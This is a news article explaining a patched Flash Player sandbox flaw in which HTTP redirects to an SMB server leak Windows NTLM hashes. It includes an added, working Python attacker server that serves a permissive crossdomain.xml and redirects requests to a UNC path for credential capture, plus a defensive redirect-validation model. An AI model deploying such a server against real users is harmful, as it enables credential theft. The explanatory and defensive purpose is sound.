Recently patched Flash Player sandbox leaks Windows credentials

According to Dutch security researcher Björn Ruytenberg, the bug is a variant of an old vulnerability, CVE-2016-4271, which Adobe patched in September 2016. That bug could enable hackers to fool users into loading a Flash file that would connect to a remote SMB server and steal Windows credentials.

The new flaw bypasses the mitigations Adobe added in Flash Player 23. In a blog post, Ruytenberg explained that the runtime now refuses outbound connections to UNC or file:// URLs, but an attacker can get around that restriction with a Flash file that makes an ordinary HTTP or HTTPS request to a remote server the attacker controls.

“By setting the HTTP Location header and an appropriate response code (e.g. 301, 302), this vulnerability can be used to redirect HTTP requests to a malicious SMB server,” he said.

In his example, the researcher hosts the malicious Flash application and the SMB server on the same machine, so both share one IP address. The Flash application runs on the victim’s machine in the remote sandbox: the runtime prohibits local file system access but allows remote connections.

“Tracing back to the Win32 API, the functions affected by Redirect-to-SMB reside in urlmon.dll. Hence, Internet Explorer and any third-party applications using them are vulnerable,” he said.

He said that Adobe’s cross-domain policy file (crossdomain.xml), which dictates when a Flash client may load resources from a domain other than the one it originated from, also played a part in the attack.

“The careful reader might notice that Adobe’s definition, unlike HTTP CORS (referencing RFC6454), restricts itself to cross-domain data handling. More specifically, it does not take into account differing protocols. This security mechanism should therefore be unrelated to our blocked attack: we are trying to redirect to SMB, a different protocol, on the same host,” he said.

Ruytenberg noted that the Flash runtime requests crossdomain.xml from the same host that serves the Flash application. By serving a least-restrictive cross-domain policy from that host, he was able to make the victim’s machine open an SMB connection to the remote server.

On that server, SMBTrap, a Python script that acts as a malicious SMB server, captures the incoming requests along with the Windows credentials (the NTLM authentication hashes) that the victim’s machine presents.
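The attacker-side HTTP endpoint described in the paragraphs above, as an added illustration (example code written for this article, not Ruytenberg’s or Adobe’s): it serves a least-restrictive crossdomain.xml and answers every other request with a 302 whose Location header points at an SMB path on the same host. The host address, share name and port are assumptions, and `build_response` is a hypothetical helper that keeps the response logic testable without opening a socket.

```python
"""Model of the attacker-controlled HTTP endpoint in the Redirect-to-SMB chain.

Two jobs: serve a least-restrictive crossdomain.xml so the Flash client
accepts this host, and answer every other request with a 3xx redirect whose
Location header is a file:// URL with a host component, which the Windows
URL stack (urlmon) resolves as a UNC path and opens over SMB.
Hypothetical example, not the researcher's code; host/share names assumed.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed attacker host: serves the SWF, this HTTP endpoint and the SMB
# listener (same IP address, as in the scenario described). RFC 5737 address.
ATTACKER_HOST = "203.0.113.10"
SMB_SHARE = "share"

# Least-restrictive policy: any domain, http or https, no policy hierarchy.
CROSSDOMAIN_XML = b"""<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
"""


def smb_location(host, share, name):
    """file://host/share/name is interpreted by urlmon as \\\\host\\share\\name."""
    return f"file://{host}/{share}/{name}"


def build_response(path, host=ATTACKER_HOST):
    """Pure response logic (hypothetical helper): returns (status, headers, body)."""
    if path == "/crossdomain.xml":
        return 200, {"Content-Type": "text/x-cross-domain-policy"}, CROSSDOMAIN_XML
    # Every other request is bounced to SMB on the same host.
    name = path.strip("/") or "index"
    return 302, {"Location": smb_location(host, SMB_SHARE, name)}, b""


class RedirectToSMBHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, body = build_response(self.path)
        self.send_response(status)
        for key, value in headers.items():
            self.send_header(key, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Port is an assumption; the SMB listener (e.g. SMBTrap) runs separately.
    HTTPServer(("0.0.0.0", 8080), RedirectToSMBHandler).serve_forever()
```

The policy file is fetched by the Flash runtime from the same host before the redirect is followed, which is why it is served alongside the redirect rather than from a separate origin.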

He added that Firefox and Internet Explorer were vulnerable to this kind of attack, while Edge and Chrome were not. All current versions of Microsoft Office were also affected. In addition, the flaw affects both the remote sandbox and the local-with-networking sandbox.

Ruytenberg said that with the new input validation introduced in Flash Player 23, Adobe had reduced the attack surface by rejecting any outbound request for a non-HTTP URL.

“Quite unexpectedly, however, input validation is only done once: while the initial HTTP request is validated, consecutive redirects are not. Combined with the fact that Flash is still susceptible to a known Windows vulnerability, this effectively kills a seemingly solid approach. This is unfortunate, and perhaps once again illustrates the underlying problem that platform-specific vulnerabilities need to be taken into account whenever possible,” he said.
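To make the “validation is only done once” point concrete, here is an added model (not Flash Player’s code and not from the researcher’s post) of two redirect-following policies: one that checks the scheme of the initial URL only, as the quote describes, and one that re-applies the same check to every Location target. The response table, host and paths are constructed for the example.

```python
"""Why validating only the first request is not enough.

`resolve` follows redirects the way a URL-loading client would. With
validate_every_hop=False it mirrors the behaviour quoted above: the initial
URL must be http/https, but later Location targets are never checked, so a
3xx pointing at file:// (UNC, hence SMB) is followed. With
validate_every_hop=True the same scheme check runs on each hop and the
redirect is refused. Model code for this article; responses are constructed.
"""
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5

# Constructed attacker responses: url -> (status, Location header or None).
# Two hops: an http->http redirect first, then http->file:// (SMB).
RESPONSES = {
    "http://203.0.113.10/payload": (302, "http://203.0.113.10/step2"),
    "http://203.0.113.10/step2": (301, "file://203.0.113.10/share/x"),
}


class BlockedRequest(Exception):
    """Raised when the scheme check rejects a URL."""


def is_permitted(url):
    """The Flash Player 23 style check: only http and https are allowed."""
    return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES


def resolve(url, responses=RESPONSES, validate_every_hop=False):
    """Return the URL the client would finally connect to.

    The initial URL is always validated. Redirect targets are validated
    only when validate_every_hop is True.
    """
    if not is_permitted(url):
        raise BlockedRequest(url)
    for _ in range(MAX_REDIRECTS):
        status, location = responses.get(url, (200, None))
        if status not in REDIRECT_STATUSES or location is None:
            return url  # final destination reached
        # urljoin keeps an absolute Location (any scheme) as-is.
        url = urljoin(url, location)
        if validate_every_hop and not is_permitted(url):
            raise BlockedRequest(url)
    raise BlockedRequest("too many redirects")


if __name__ == "__main__":
    start = "http://203.0.113.10/payload"
    print("validate once  ->", resolve(start))
    try:
        resolve(start, validate_every_hop=True)
    except BlockedRequest as exc:
        print("validate hops  -> blocked:", exc)
```

The fix is the one line in the loop: the same check that guards the first request has to run on every redirect target, because a redirect is just another outbound request chosen by the server.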